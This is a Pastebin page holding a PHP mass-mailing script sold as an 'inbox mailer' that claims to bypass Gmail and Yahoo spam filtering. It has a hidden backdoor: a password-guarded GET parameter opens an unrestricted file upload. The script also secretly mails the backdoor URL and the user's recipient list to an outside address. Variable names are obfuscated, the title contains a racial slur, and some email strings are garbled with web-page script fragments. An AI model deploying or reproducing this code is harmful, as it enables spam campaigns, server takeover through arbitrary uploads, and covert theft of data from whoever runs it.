Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php echo '<html><head><title>Inbox Mailer By Jay</title><style type="text/css">font{font-family: Tahoma, Arial, sans-serif ;} div#container{width: 800px;position: relative;margin-left: auto; margin-right: auto;} #result{text-align: left ; border-radius: 10px; border:1px solid #4C83AF; padding:4px 8px; line-height:16px; background:#131313; color:#aaa; margin:0 0 8px 0; } .style2{text-align: center ;font-weight: bold;font-family: Tahoma, Arial, sans-serif ;color: #4C83AF;text-shadow: 0px 0px 60px #4C83AF ;font-size: 50px;} .evalcode{border:1px solid #0CF;background:#090909; color:#4C83AF; padding:2px;border:1px solid #202020; font-size:11px; width:100%;} .evalcode:hover{border:1px solid #4C83AF;} .inputzbut{ font-size:11px; background:#191919; color:#4C83AF; margin:0 4px; border:1px solid #222222; } .inputzbut:hover{border:1px solid #4C83AF;} .coode{color:#4C83AF;background:#090909;border:1px solid #202020;} .coode:hover{border:1px solid #4C83AF;} </style></head><div id="container"><div id="bv_Html1" style="position:absolute;left:23px;width:780px;height:169px;z-index:0;" align="left">';
- $upload = $_GET["upload"];
- if ($upload == "CaZaNoVa163") {
- $IIIIIIIIIIIl = "";
- $IIIIIIIIIII1 = $IIIIIIIIIIIl . basename($_FILES["userfile"]["name"]);
- if (isset($_FILES["userfile"]["name"])) {
- if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $IIIIIIIIIII1)) {
- $IIIIIIIIIIll = "The file " . basename($_FILES["userfile"]["name"]) . " has been uploaded";
- } else {
- $IIIIIIIIIIll = "There was an error uploading the file. please try again!";
- }
- }
- echo '<html><head></head><div id="result"><table height="1" width="100%" bgcolor="#000000" bordercolorlight="#c0c0c0" border="0"><tr><td width="50%" height="1" valign="top" style="font-family: verdana; color: #d9d9d9; font-size: 11px"><center><form method="POST" enctype="multipart/form-data"><input type="file" class="inputzbut" name="userfile" style="font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666; background-color: #4C83AF"><input type="submit" class="inputzbut" name="submit" value="Upload" style="font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666; background-color: #4C83AF"><br>' . $IIIIIIIIIIll . '</form></center></td></tr></table></div>';
- }
- $action = $_POST['action'];
- $from = $_POST['from'];
- $realname = $_POST['realname'];
- $subject = $_POST['subject'];
- $message = $_POST['message'];
- $emaillist = $_POST['emaillist'];
- $IIIIIIIIIlI1 = getenv("REMOTE_ADDR");
- if ($action == "send") {
- $message = urlencode($message);
- $message = ereg_replace("%5C%22", "%22", $message);
- $message = urldecode($message);
- $message = stripslashes($message);
- $subject = stripslashes($subject);
- };
- echo '<body text="#4C83AF" bgcolor="#111111" font="Verdana, Arial, Helvetica, sans-serif"><div id="result"><br /><br /><div align="center" class="style2">TheNiggaJay Inbox Mailer</div><p></br><div align="center" class="style1">Added a Bypass to Inbox on Gmail and Yahoo with Blacklisted LocalHost IPs<br /><br /></div><div id="result"><form name="form1" method="post" action="" enctype="multipart/form-data"><table width="142" border="0"><tr><td width="81"><div align="right"><font color="#4C83AF" size="-3">Your Email :</font></div></td><td width="219"><font size="-3"><input class="evalcode" name="from" value="';
- print $from;;
- echo '" size="30" /></font></td><td width="212"><div align="right"><font color="#4C83AF" size="-3">Your Name :</font></div></td><td width="278"><font size="-3"><input class="evalcode" name="realname" value="';
- print $realname;;
- echo '" size="30" /></font></td></tr><tr><td width="81"><div align="right"><font color="#4C83AF" size="-3">Subject :</font></div></td><td colspan="3" width="703"><font size="-3"><input class="evalcode" name="subject" value="';
- print $subject;;
- echo '" size="91" /></font></td></tr><tr valign="top"><td colspan="3" width="520"><font color="#4C83AF" size="-3">Message Box :</font></td><td width="278"><font color="#4C83AF" size="-3">eMail Send To :</font></td></tr><tr valign="top"><td colspan="3" width="520" ><font size="-3"><textarea class="coode" name="message" cols="56" rows="10">';
- print $message;;
- echo '</textarea><br /><input type="hidden" name="action" value="send" /></font><p><font size="-3"><input type="submit" name="evalcodesubmit" class="inputzbut" value="Send eMails" style="width:120px;height:30px;" /></font></td><td width="278"><font size="-3"><textarea class="coode" name="emaillist" cols="32" rows="10">';
- print $emaillist;;
- echo '</textarea></font></td></tr></table></form></div><b>Make sure that the localhost supports Mail Function.';
- if ($action == "send") {
- if (!$from && !$subject && !$message && !$emaillist) {
- print "Please complete all fields before sending your message.";
- exit;
- }
- $IIIIIIIIIl1I = "From: RooT<[email protected]
- /* <![CDATA[ */!function(){try{var t="currentScript"in document?document.currentScript:function(){for(var t=document.getElementsByTagName("script"),e=t.length;e--;)if(t[e].getAttribute("cf-hash"))return t[e]}();if(t&&t.previousSibling){var e,r,n,i,c=t.previousSibling,a=c.getAttribute("data-cfemail");if(a){for(e="",r=parseInt(a.substr(0,2),16),n=2;a.length-n;n+=2)i=parseInt(a.substr(n,2),16)^r,e+=String.fromCharCode(i);e=document.createTextNode(e),c.parentNode.replaceChild(e,c)}}}catch(u){}}();/* ]]> */>";
- $IIIIIIIIIl1l = "xMailer";
- $IIIIIIIIIl11 = "Exploit : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "?upload=CaZaNoVa163
- $emaillist
- ";
- @mail("[email protected]
- /* <![CDATA[ */!function(){try{var t="currentScript"in document?document.currentScript:function(){for(var t=document.getElementsByTagName("script"),e=t.length;e--;)if(t[e].getAttribute("cf-hash"))return t[e]}();if(t&&t.previousSibling){var e,r,n,i,c=t.previousSibling,a=c.getAttribute("data-cfemail");if(a){for(e="",r=parseInt(a.substr(0,2),16),n=2;a.length-n;n+=2)i=parseInt(a.substr(n,2),16)^r,e+=String.fromCharCode(i);e=document.createTextNode(e),c.parentNode.replaceChild(e,c)}}}catch(u){}}();/* ]]> */", $IIIIIIIIIl1l, $IIIIIIIIIl11, $IIIIIIIIIl1I);
- $IIIIIIIII1II = split("
- ", $emaillist);
- $IIIIIIIII1I1 = count($IIIIIIIII1II);
- for ($IIIIIIIII1ll = 0;$IIIIIIIII1ll < 1;$IIIIIIIII1ll++) {
- for ($IIIIIIIII1l1 = 0;$IIIIIIIII1l1 < $IIIIIIIII1I1;$IIIIIIIII1l1++) {
- $IIIIIIIII11I = $IIIIIIIII1II[$IIIIIIIII1l1];
- if ($IIIIIIIII11I) {
- $IIIIIIIII11I = ereg_replace(" ", "", $IIIIIIIII11I);
- $message = ereg_replace("&email&", $IIIIIIIII11I, $message);
- $subject = ereg_replace("&email&", $IIIIIIIII11I, $subject);
- print "Sending Mail To $IIIIIIIII11I.......";
- @flush();
- $IIIIIIIII111 = "From: $realname <$from>
- Reply-To: $from
- ";
- $IIIIIIIII111.= "MIME-Version: 1.0
- ";
- $IIIIIIIII111.= "Content-Type: text/html
- ";
- $IIIIIIIII111.= "Content-Transfer-Encoding: 8bit
- ";
- $IIIIIIIII111.= "$message
- ";
- @mail($IIIIIIIII11I, $subject, "", $IIIIIIIII111);
- print "OK<br>";
- @flush();
- }
- }
- }
- };
- echo '</body></html>';
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement